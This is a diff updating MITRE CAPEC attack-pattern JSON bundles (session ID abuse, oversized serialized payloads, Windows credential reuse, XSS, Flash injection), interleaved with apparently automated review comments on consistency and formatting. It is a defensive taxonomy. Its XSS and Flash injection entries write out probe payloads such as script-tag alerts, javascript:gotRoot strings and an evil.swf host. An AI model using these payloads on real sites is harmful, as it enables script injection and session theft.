user to perform social engineering attacks.</p></li><li> <p> <b>Data Exfiltration: </b>The adversary can obtain sensitive data contained within the system or application.</p></li></ol></div>",
|
||||
"x_capec_likelihood_of_attack": "High",
|
||||
"x_capec_prerequisites": [
|
||||
"Server software must rely on weak session IDs proof and/or verification schemes"
|
||||
"Server software must rely on weak identifier proof and/or verification schemes.",
|
||||
"Identifiers must have long lifetimes and potential for reusability.",
|
||||
"Server software must allow concurrent sessions to exist."
|
||||
],
|
||||
"x_capec_resources_required": [
|
||||
"Ability to deploy software on network. Ability to communicate synchronously or asynchronously with server"
|
||||
"Ability to deploy software on network.",
|
||||
"Ability to communicate synchronously or asynchronously with server."
|
||||
],
|
||||
"x_capec_skills_required": {
|
||||
"Low": "To achieve a direct connection with the weak or non-existent server session access control, and pose as an authorized user"
|
||||
},
|
||||
"x_capec_status": "Draft",
|
||||
"x_capec_status": "Stable",
|
||||
"x_capec_typical_severity": "High",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
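Review bot: The rewritten `"description"` now lists three ways to abuse an identifier (guessing, obtaining, and "riding" it via a malicious link as in CSRF), but the example in `"x_capec_example_instances"` still says `There are two main ways for an adversary to exploit session IDs.` and covers only brute force and interception, so the two fields disagree after this change. Either drop the count from the example (`Common ways for an adversary to exploit session IDs include:`) or add a third paragraph for the CSRF case the description introduces. The new ATT&CK mapping `T1134.001` (Token Impersonation/Theft) is, as I read it, specific to Windows access tokens, while this pattern is written around web session IDs and cookies; a qualifying phrase in that reference's `"description"` would keep the mapping from implying the pattern is host-level. Promoting `x_capec_status` from `Draft` to `Stable` in the same commit that rewrites the name, description and prerequisites seems premature; I would leave it `Draft` until the new text has been reviewed.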
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--c15c7648-a7be-4a4a-863e-0d3e9be3eaa2",
|
||||
"id": "bundle--e67b597d-9347-4ef2-94ea-f37ccb5ccd76",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -8,9 +8,9 @@
|
||||
"id": "attack-pattern--247019da-353e-4910-9d11-7dc6c0421a17",
|
||||
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
|
||||
"created": "2014-06-23T00:00:00.000Z",
|
||||
"modified": "2019-09-30T00:00:00.000Z",
|
||||
"name": "XML Oversized Payloads",
|
||||
"description": "Applications often need to transform data in and out of the XML format by using an XML parser. It may be possible for an adversary to inject data that may have an adverse effect on the XML parser when it is being processed. By supplying oversized payloads in input vectors that will be processed by the XML parser, an adversary can cause the XML parser to consume more resources while processing, causing excessive memory consumption and CPU utilization, and potentially cause execution of arbitrary code. An adversary's goal is to leverage parser failure to his or her advantage. In many cases this type of an attack will result in a XML Denial of Service (XDoS) due to an application becoming unstable, freezing, or crashing. However it is possible to cause a crash resulting in arbitrary code execution, leading to a jump from the data plane to the control plane [R.231.1]. XDoS is most closely associated with web services, SOAP, and Rest, because remote service requesters can post malicious XML payloads to the service provider designed to exhaust the service provider's memory, CPU, and/or disk space. The main weakness in XDoS is that the service provider generally must inspect, parse, and validate the XML messages to determine routing, workflow, security considerations, and so on. It is exactly these inspection, parsing, and validation routines that XDoS targets. This attack exploits the loosely coupled nature of web services, where the service provider has little to no control over the service requester and any messages the service requester sends.",
|
||||
"modified": "2020-07-30T00:00:00.000Z",
|
||||
"name": "Oversized Serialized Data Payloads",
|
||||
"description": "Applications often need to transform data in and out of serialized data formats, such as XML and YAML, by using a data parser. It may be possible for an adversary to inject data that may have an adverse effect on the parser when it is being processed. By supplying oversized payloads in input vectors that will be processed by the parser, an adversary can cause the parser to consume more resources while processing, causing excessive memory consumption and CPU utilization, and potentially cause execution of arbitrary code. An adversary's goal is to leverage parser failure to their advantage. In many cases this type of an attack will result in an XML Denial of Service (XDoS) or similar Denial of Service (DoS) due to an application becoming unstable, freezing, or crashing. However it is possible to cause a crash resulting in arbitrary code execution, leading to a jump from the data plane to the control plane [REF-89]. DoS is most closely associated with web services, SOAP, and Rest, because remote service requesters can post malicious data payloads to the service provider designed to exhaust the service provider's memory, CPU, and/or disk space. The main weakness in serialized data related DoS is that the service provider generally must inspect, parse, and validate the data messages to determine routing, workflow, security considerations, and so on. It is exactly these inspection, parsing, and validation routines that DoS targets. This attack exploits the loosely coupled nature of web services, where the service provider has little to no control over the service requester and any messages the service requester sends.",
|
||||
"external_references": [
|
||||
{
|
||||
"source_name": "capec",
|
||||
@@ -76,10 +76,11 @@
|
||||
"Execute Unauthorized Commands"
|
||||
]
|
||||
},
|
||||
"x_capec_execution_flow": "<h2> Execution Flow </h2><div><h3>Explore</h3><ol><li> <p>An adversary determines the input data stream that is being processed by an serialized data parser on the victim's side.</p></li></ol></div><div><h3>Experiment</h3><ol><li> <p>An adversary crafts input data that may have an adverse effect on the operation of the data parser when the data is parsed on the victim's system.</p></li></ol></div>",
|
||||
"x_capec_likelihood_of_attack": "Medium",
|
||||
"x_capec_prerequisites": [
|
||||
"An application uses an XML parser to perform transformation on user-controllable data.",
|
||||
"An application does not perform sufficient validation to ensure that user-controllable data is safe for an XML parser."
|
||||
"An application uses an parser for serialized data to perform transformation on user-controllable data.",
|
||||
"An application does not perform sufficient validation to ensure that user-controllable data is safe for a data parser."
|
||||
],
|
||||
"x_capec_skills_required": {
|
||||
"High": "Arbitrary code execution",
|
||||
@@ -87,7 +88,7 @@
|
||||
},
|
||||
"x_capec_status": "Draft",
|
||||
"x_capec_typical_severity": "High",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
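Review bot: The new `"x_capec_execution_flow"` stops at the Experiment phase (`An adversary crafts input data...`) and never states the step that delivers the oversized payload to the parser, so the flow describes preparation but not the attack itself; an Exploit entry such as `<div><h3>Exploit</h3><ol><li> <p>An adversary sends the crafted oversized payload through the identified input vector, causing the parser to exhaust memory or CPU, or to crash.</p></li></ol></div>` would complete it. In the prerequisites, `An application uses an parser for serialized data` should read `a parser`, and the Explore step has the same slip (`an serialized data parser`). The citation changed from `[R.231.1]` to `[REF-89]`; I cannot confirm from this view that `REF-89` is the intended entry in the references list, so that is worth checking against the reference table.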
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--9dfb06eb-d511-4d4b-ba41-2afc846a3c61",
|
||||
"id": "bundle--7e5db4b4-72f9-471b-8d03-f04dbbbacd13",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -43,7 +43,7 @@
|
||||
},
|
||||
"x_capec_status": "Stable",
|
||||
"x_capec_typical_severity": "Low",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--f175099f-67fc-44d0-95fa-8748a9dcfbf0",
|
||||
"id": "bundle--7db9ac2e-b681-4d76-b054-73ba4ddff667",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -22,6 +22,12 @@
|
||||
"url": "http://cwe.mitre.org/data/definitions/200.html",
|
||||
"external_id": "CWE-200"
|
||||
},
|
||||
{
|
||||
"source_name": "ATTACK",
|
||||
"description": "System Time Discovery",
|
||||
"url": "https://attack.mitre.org/wiki/Technique/T1124",
|
||||
"external_id": "T1124"
|
||||
},
|
||||
{
|
||||
"source_name": "reference_from_CAPEC",
|
||||
"description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill",
|
||||
@@ -72,7 +78,7 @@
|
||||
],
|
||||
"x_capec_status": "Stable",
|
||||
"x_capec_typical_severity": "Low",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -0,0 +1,115 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--1a145cf3-adb9-4942-b5a8-151aea3d4ea7",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
"type": "attack-pattern",
|
||||
"id": "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a",
|
||||
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
|
||||
"created": "2020-07-30T00:00:00.000Z",
|
||||
"modified": "2020-07-30T00:00:00.000Z",
|
||||
"name": "Use of Known Windows Credentials",
|
||||
"description": "An adversary guesses or obtains (i.e. steals or purchases) legitimate Windows domain credentials (e.g. userID/password) to achieve authentication and to perform authorized actions on the domain, under the guise of an authenticated user or service. Attacks leveraging trusted Windows credentials typically result in the adversary laterally moving within the local Windows network, since users are often allowed to login to systems/applications within the domain using their Windows domain password. This domain authentication can occur directly (user typing in their password or PIN) or via Single Sign-On (SSO) or cloud-based authentication, which often don't verify the authenticity of the user's input. Known credentials are usually obtained by an adversary via a system/application breach and/or by purchasing dumps of credentials on the dark web. These credentials may be further gleaned via exposed configuration and properties files that contain system passwords, database connection strings, and other sensitive data. Utilizing known Windows credentials, an adversary can obtain sensitive data from administrator shares, download/install malware on the system, pose as a legitimate user for social engineering purposes, and more. Ultimately, successful spoofing and impersonation of trusted credentials can lead to an adversary breaking authentication, authorization, and audit controls with the target system or application.",
|
||||
"external_references": [
|
||||
{
|
||||
"source_name": "capec",
|
||||
"url": "https://capec.mitre.org/data/definitions/653.html",
|
||||
"external_id": "CAPEC-653"
|
||||
},
|
||||
{
|
||||
"source_name": "cwe",
|
||||
"url": "http://cwe.mitre.org/data/definitions/522.html",
|
||||
"external_id": "CWE-522"
|
||||
},
|
||||
{
|
||||
"source_name": "cwe",
|
||||
"url": "http://cwe.mitre.org/data/definitions/307.html",
|
||||
"external_id": "CWE-307"
|
||||
},
|
||||
{
|
||||
"source_name": "cwe",
|
||||
"url": "http://cwe.mitre.org/data/definitions/308.html",
|
||||
"external_id": "CWE-308"
|
||||
},
|
||||
{
|
||||
"source_name": "cwe",
|
||||
"url": "http://cwe.mitre.org/data/definitions/309.html",
|
||||
"external_id": "CWE-309"
|
||||
},
|
||||
{
|
||||
"source_name": "cwe",
|
||||
"url": "http://cwe.mitre.org/data/definitions/262.html",
|
||||
"external_id": "CWE-262"
|
||||
},
|
||||
{
|
||||
"source_name": "cwe",
|
||||
"url": "http://cwe.mitre.org/data/definitions/263.html",
|
||||
"external_id": "CWE-263"
|
||||
},
|
||||
{
|
||||
"source_name": "cwe",
|
||||
"url": "http://cwe.mitre.org/data/definitions/654.html",
|
||||
"external_id": "CWE-654"
|
||||
},
|
||||
{
|
||||
"source_name": "reference_from_CAPEC",
|
||||
"description": "Dan Goodin, Attackers can use Zoom to steal users\u2019 Windows credentials with no warning, 2020--04---01, Ars Technica",
|
||||
"url": "https://arstechnica.com/information-technology/2020/04/unpatched-zoom-bug-lets-attackers-steal-windows-credentials-with-no-warning/",
|
||||
"external_id": "REF-575"
|
||||
},
|
||||
{
|
||||
"source_name": "reference_from_CAPEC",
|
||||
"description": "Jeff Warren, How Attackers are Stealing Your Credentials with Mimikatz, 2017--07---11, STEALTHbits Technologies, Inc.",
|
||||
"url": "https://blog.stealthbits.com/how-attackers-are-stealing-your-credentials-with-mimikatz/",
|
||||
"external_id": "REF-576"
|
||||
}
|
||||
],
|
||||
"object_marking_refs": [
|
||||
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
|
||||
],
|
||||
"x_capec_abstraction": "Standard",
|
||||
"x_capec_consequences": {
|
||||
"Access_Control": [
|
||||
"Gain Privileges"
|
||||
],
|
||||
"Authentication": [
|
||||
"Gain Privileges"
|
||||
],
|
||||
"Authorization": [
|
||||
"Read Data"
|
||||
],
|
||||
"Confidentiality": [
|
||||
"Gain Privileges",
|
||||
"Read Data"
|
||||
],
|
||||
"Integrity": [
|
||||
"Modify Data"
|
||||
]
|
||||
},
|
||||
"x_capec_example_instances": [
|
||||
"Adversaries exploited the Zoom video conferencing application during the 2020 COVID-19 pandemic to exfiltrate Windows domain credentials from a target system. The attack entailed sending Universal Naming Convention (UNC) paths within the Zoom chat window of an unprotected Zoom call. If the victim clicked on the link, their Windows usernames and the corresponding Net-NTLM-v2 hashes were sent to the address contained in the link. The adversary was then able to infiltrate and laterally move within the Windows domain by passing the acquired credentials to shared network resources. This further provided adversaries with access to Outlook servers and network storage devices. [REF-575]",
|
||||
"Mimikatz, a post-exploitation Windows credential harvester, can be used to gather and exploit Windows credentials. This malware has been used in several known cyberattacks, such as the Petya Ransomeware attacks. [REF-576]"
|
||||
],
|
||||
"x_capec_execution_flow": "<h2> Execution Flow </h2><div><h3>Explore</h3><ol><li> <p> <b>Acquire known Windows credentials: </b>The adversary must obtain known Windows credentials in order to access the target system, application, or service within the domain.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>An adversary purchases breached Windows username/password combinations or leaked hashed passwords from the dark web.</td></tr><tr><td>An adversary leverages a key logger or phishing attack to steal user credentials as they are provided.</td></tr><tr><td>An adversary conducts a sniffing attack to steal Windows credentials as they are transmitted.</td></tr><tr><td>An adversary gains access to a Windows domain system/files and exfiltrates Windows password hashes.</td></tr><tr><td>An adversary examines outward-facing configuration and properties files to discover hardcoded Windows credentials.</td></tr></tbody></table></ol></div><div><h3>Experiment</h3><ol><li> <p> <b>Attempt domain authentication: </b>Try each Windows credential against various systems, applications, and services within the domain until the target grants access.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Manually or automatically enter each credential through the target's interface.</td></tr></tbody></table></ol></div><div><h3>Exploit</h3><ol><li> <p> <b>Impersonate: </b>An adversary can use successful experiments or authentications to impersonate an authorized user or system, or to laterally move within the domain</p></li><li> <p> <b>Spoofing: </b>Malicious data can be injected into the target system or into other systems on the domain. The adversary can also pose as a legitimate domain user to perform social engineering attacks.</p></li><li> <p> <b>Data Exfiltration: </b>The adversary can obtain sensitive data contained within domain systems or applications.</p></li></ol></div>",
|
||||
"x_capec_likelihood_of_attack": "High",
|
||||
"x_capec_prerequisites": [
|
||||
"The system/application is connected to the Windows domain.",
|
||||
"The system/application uses one factor password-based authentication, SSO, and/or cloud-based authentication.",
|
||||
"The system/application does not have a sound password policy that is being enforced.",
|
||||
"The system/application does not implement an effective password throttling mechanism.",
|
||||
"The adversary possesses a list of known Windows user accounts and corresponding passwords that may exist on the target."
|
||||
],
|
||||
"x_capec_resources_required": [
|
||||
"A list of known Windows credentials for the targeted domain.",
|
||||
"A custom script that leverages a Windows credential list to launch an attack."
|
||||
],
|
||||
"x_capec_skills_required": {
|
||||
"Low": "Once an adversary obtains a known Windows credential, leveraging it is trivial."
|
||||
},
|
||||
"x_capec_status": "Draft",
|
||||
"x_capec_typical_severity": "High",
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
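Review bot: The new CAPEC-653 bundle carries no `ATTACK` external reference, while the sibling sections in this commit add ATT&CK mappings (T1124, T1055, T1574.007) to existing patterns; a pattern about authenticating with stolen domain credentials maps naturally to Valid Accounts (T1078), so the omission reads as a gap in the mapping pass rather than a deliberate choice, worth confirming. Two smaller points in the same file: the `reference_from_CAPEC` descriptions encode dates as `2020--04---01` and `2017--07---11`, a format that matches neither the RFC 3339 `created`/`modified` fields nor anything a consumer can parse, and since the same shape appears in older entries (`2004--02`) it looks like a year/month/day join artifact in the generator; and the second example instance reads `Petya Ransomeware` where `Ransomware` is meant. The object is otherwise well-formed: every key and value is strictly double-quoted, `object_marking_refs` is an array, and `x_capec_version` is `"3.3"`, consistent with the bumps elsewhere in the commit.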
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--ec15c1ed-b472-45c9-8826-7639736def57",
|
||||
"id": "bundle--c950dea4-4cc7-49f2-b968-3bd70c536654",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -40,7 +40,7 @@
|
||||
],
|
||||
"x_capec_status": "Draft",
|
||||
"x_capec_typical_severity": "Low",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--970b1f00-2631-4943-8519-f3099d7c4ab8",
|
||||
"id": "bundle--e8a34eeb-a18f-41fc-a5f1-13c521854550",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -8,7 +8,7 @@
|
||||
"id": "attack-pattern--283d665d-e109-4d5d-8993-6fb25e5923d6",
|
||||
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
|
||||
"created": "2014-06-23T00:00:00.000Z",
|
||||
"modified": "2019-04-04T00:00:00.000Z",
|
||||
"modified": "2020-07-30T00:00:00.000Z",
|
||||
"name": "Local Code Inclusion",
|
||||
"description": "The attacker forces an application to load arbitrary code files from the local machine. The attacker could use this to try to load old versions of library files that have known vulnerabilities, to load files that the attacker placed on the local machine during a prior attack, or to otherwise change the functionality of the targeted application in unexpected ways.",
|
||||
"external_references": [
|
||||
@@ -21,6 +21,12 @@
|
||||
"source_name": "cwe",
|
||||
"url": "http://cwe.mitre.org/data/definitions/829.html",
|
||||
"external_id": "CWE-829"
|
||||
},
|
||||
{
|
||||
"source_name": "ATTACK",
|
||||
"description": "Process Injection",
|
||||
"url": "https://attack.mitre.org/wiki/Technique/T1055",
|
||||
"external_id": "T1055"
|
||||
}
|
||||
],
|
||||
"object_marking_refs": [
|
||||
@@ -44,7 +50,7 @@
|
||||
],
|
||||
"x_capec_status": "Stable",
|
||||
"x_capec_typical_severity": "Medium",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--a64658e2-5436-4b74-9c6b-5476ef877497",
|
||||
"id": "bundle--08ed96b9-2a7e-4f49-b15b-de03a8df957c",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -8,7 +8,7 @@
|
||||
"id": "attack-pattern--28aff255-abc8-4392-872c-61f78d4fe55b",
|
||||
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
|
||||
"created": "2014-06-23T00:00:00.000Z",
|
||||
"modified": "2018-07-31T00:00:00.000Z",
|
||||
"modified": "2020-07-30T00:00:00.000Z",
|
||||
"name": "XSS Through HTTP Query Strings",
|
||||
"description": "An adversary embeds malicious script code in the parameters of an HTTP query string and convinces a victim to submit the HTTP request that contains the query string to a vulnerable web application. The web application then procedes to use the values parameters without properly validation them first and generates the HTML code that will be executed by the victim's browser.",
|
||||
"external_references": [
|
||||
@@ -48,6 +48,7 @@
|
||||
"http://user:host@example.com:8080/oradb<script>alert('Hi')</script>",
|
||||
"\n <xhtml:p>Web applications that accept name value pairs in a HTTP Query string are inherently at risk to any value (or name for that matter) that an attacker would like to enter in the query string. This can be done manually via web browser or trivially scripted to post the query string to multiple sites. In the latter case, in the instance of many sites using similar infrastructure with predictable http queries being accepted and operated on (such as blogging software, Google applications, and so on), a single malicious payload can be scripted to target a wide variety of sites.</xhtml:p>\n <xhtml:p>Web 2.0 type sites like Technorati and del.icio.us rely on user generated content like tags to build http links that are displayed to other users. del.icio.us allows users to identify sites, tag them with metadata and provide URL, descriptions and more data. This data is then echoed back to any other web browser that is interested in the link. If the data is not validated by the del.icio.us site properly then an arbitrary code can be added into the standard http string sent to del.icio.us by the attacker, for example formatted as normal content with a URL and description and tagged as Java, and available to be clicked on (and executed by) any user browsing for Java content that clicks on this trojaned content.</xhtml:p>\n "
|
||||
],
|
||||
"x_capec_execution_flow": "<h2> Execution Flow </h2><div><h3>Explore</h3><ol><li> <p> <b>Spider: </b>Using a browser or an automated tool, an attacker follows all public links on a web site. They record all the links they find.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Use a spidering tool to follow and record all links. Make special note of any links that include parameters in the URL.</td></tr><tr><td>Use a proxy tool to record all links visited during a manual traversal of the web application. Make special note of any links that include parameters in the URL. Manual traversal of this type is frequently necessary to identify forms that are GET method forms rather than POST forms.</td></tr><tr><td>Use a browser to manually explore the website and analyze how it is constructed. Many browser's plugins are available to facilitate the analysis or automate the URL discovery.</td></tr></tbody></table></ol></div><div><h3>Experiment</h3><ol><li> <p> <b>Attempt variations on input parameters: </b>Possibly using an automated tool, an attacker requests variations on the URLs they spidered before. They send parameters that include variations of payloads. They record all the responses from the server that include unmodified versions of their script.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Use a list of XSS probe strings to inject in parameters of known URLs. 
If possible, the probe strings contain a unique identifier.</td></tr><tr><td>Use a proxy tool to record results of manual input of XSS probes in known URLs.</td></tr></tbody></table></ol></div><div><h3>Exploit</h3><ol><li> <p> <b>Steal session IDs, credentials, page content, etc.: </b>As the attacker succeeds in exploiting the vulnerability, they can choose to steal user's credentials in order to reuse or to analyze them later on.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and sends document information to the attacker.</td></tr><tr><td>Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker's server and then causes the browser to execute appropriately.</td></tr></tbody></table><li> <p> <b>Forceful browsing: </b>When the attacker targets the current application or another one (through CSRF vulnerabilities), the user will then be the one who perform the attacks without being aware of it. 
These attacks are mostly targeting application logic flaws, but it can also be used to create a widespread attack against a particular website on the user's current network (Internet or not).</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and performs actions on the same web site</td></tr><tr><td>Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker's server and then causes the browser to execute request to other web sites (especially the web applications that have CSRF vulnerabilities).</td></tr></tbody></table><li> <p> <b>Content spoofing: </b>By manipulating the content, the attacker targets the information that the user would like to get from the website.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and exposes attacker-modified invalid information to the user on the current web page.</td></tr></tbody></table></ol></div>",
|
||||
"x_capec_likelihood_of_attack": "High",
|
||||
"x_capec_prerequisites": [
|
||||
"Target client software must allow scripting such as JavaScript. Server software must allow display of remote generated HTML without sufficient input or output validation."
|
||||
@@ -61,7 +62,7 @@
|
||||
},
|
||||
"x_capec_status": "Draft",
|
||||
"x_capec_typical_severity": "High",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
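Review bot: The `x_capec_execution_flow` string added in this section's `@@ -48,6 +48,7 @@` hunk appears to contain a raw line-break control character rather than an escaped one: the rendered value breaks after `inject in parameters of known URLs. ` and again after `without being aware of it. ` with no diff gutter between the fragments, unlike the `\n` escapes used in the example instance a few lines above. RFC 8259 forbids unescaped U+0000–U+001F inside strings, so a strict parser will reject the whole bundle, not just this field; the generator should either collapse the break to a single space or emit it as `\n`, whichever the source XML intends. This is inferred from the page rendering, so confirm against the raw file bytes before changing the generator.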
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--68c30777-71d5-41dd-a310-11f02f551e65",
|
||||
"id": "bundle--489df7ff-3bf6-4f4a-b713-df94b5ae396a",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -23,7 +23,7 @@
|
||||
],
|
||||
"x_capec_abstraction": "Standard",
|
||||
"x_capec_status": "Deprecated",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--baccbe37-cfb6-4869-b4c2-6c4774466ec8",
|
||||
"id": "bundle--62487b2a-4039-4d8f-a74f-0daf4cb01b40",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -41,7 +41,7 @@
|
||||
],
|
||||
"x_capec_status": "Draft",
|
||||
"x_capec_typical_severity": "Low",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--683aa28f-897e-48e9-b86d-be8e08a394cd",
|
||||
"id": "bundle--f6cdd352-f716-459b-a06f-4e0ab288a460",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -30,7 +30,7 @@
|
||||
],
|
||||
"x_capec_status": "Draft",
|
||||
"x_capec_typical_severity": "High",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--aa57cda6-bc94-49ba-a901-b288d92cea90",
|
||||
"id": "bundle--e3c325cd-5243-4539-b91f-9b00f8ede0c9",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -83,6 +83,7 @@
|
||||
"x_capec_example_instances": [
|
||||
"\n <xhtml:p>In the following example, the SWF file contains</xhtml:p>\n <xhtml:div style=\"margin-left:10px;\" class=\"informative\">getURL('javascript:SomeFunc(\"someValue\")','','GET')</xhtml:div>\n <xhtml:p>A request like</xhtml:p>\n <xhtml:div style=\"margin-left:10px;\" class=\"informative\">http://example.com/noundef.swf?a=0:0;alert('XSS')</xhtml:div>\n <xhtml:p>becomes</xhtml:p>\n <xhtml:div style=\"margin-left:10px;\" class=\"informative\">javascript:SomeFunc(\"someValue\")?a=0:0;alert(123)</xhtml:div>\n "
|
||||
],
|
||||
"x_capec_execution_flow": "<h2> Execution Flow </h2><div><h3>Explore</h3><ol><li> <p> <b>Find Injection Entry Points: </b>The attacker first takes an inventory of the entry points of the application.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Spider the website for all available URLs that reference a Flash application.</td></tr><tr><td>List all uninitialized global variables (such as _root.*, _global.*, _level0.*) in ActionScript, registered global variables in included files, load variables to external movies.</td></tr></tbody></table></ol></div><div><h3>Experiment</h3><ol><li> <p> <b>Determine the application's susceptibility to Flash injection: </b>Determine the application's susceptibility to Flash injection. For each URL identified in the explore phase, the attacker attempts to use various techniques such as direct load asfunction, controlled evil page/host, Flash HTML injection, and DOM injection to determine whether the application is susceptible to Flash injection.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Test the page using direct load asfunction, getURL,javascript:gotRoot(\"\")///d.jpg</td></tr><tr><td>Test the page using controlled evil page/host, http://example.com/evil.swf</td></tr><tr><td>Test the page using Flash HTML injection, \"'><img src='asfunction:getURL,javascript:gotRoot(\"\")//.jpg' ></td></tr><tr><td>Test the page using DOM injection, (gotRoot(''))</td></tr></tbody></table></ol></div><div><h3>Exploit</h3><ol><li> <p> <b>Inject malicious content into target: </b>Inject malicious content into target utilizing vulnerable injection vectors identified in the Experiment phase</p></li></ol></div>",
|
||||
"x_capec_likelihood_of_attack": "High",
|
||||
"x_capec_prerequisites": [
|
||||
"The target must be capable of running Flash applications. In some cases, the victim must follow an attacker-supplied link."
|
||||
@@ -95,7 +96,7 @@
|
||||
},
|
||||
"x_capec_status": "Draft",
|
||||
"x_capec_typical_severity": "Medium",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--91410eca-9947-4354-8198-081d1ee742be",
|
||||
"id": "bundle--7c22cdd8-1e11-4ba5-9ce3-6833d950e7a5",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -60,7 +60,7 @@
|
||||
],
|
||||
"x_capec_status": "Draft",
|
||||
"x_capec_typical_severity": "Low",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--1acd1035-21e4-4c53-8b4d-0f79a422cd72",
|
||||
"id": "bundle--562218fa-5233-43d2-922d-d99e88c9775d",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -41,7 +41,7 @@
|
||||
},
|
||||
"x_capec_status": "Draft",
|
||||
"x_capec_typical_severity": "Medium",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--d4e70f6a-fe79-4637-b183-b42704735ea6",
|
||||
"id": "bundle--79008cad-2470-4af1-acca-13073f9a03ba",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -8,7 +8,7 @@
|
||||
"id": "attack-pattern--2b8d7aaf-bd4b-424f-8df4-6d0f37b72f4b",
|
||||
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
|
||||
"created": "2014-06-23T00:00:00.000Z",
|
||||
"modified": "2018-07-31T00:00:00.000Z",
|
||||
"modified": "2020-07-30T00:00:00.000Z",
|
||||
"name": "Subvert Code-signing Facilities",
|
||||
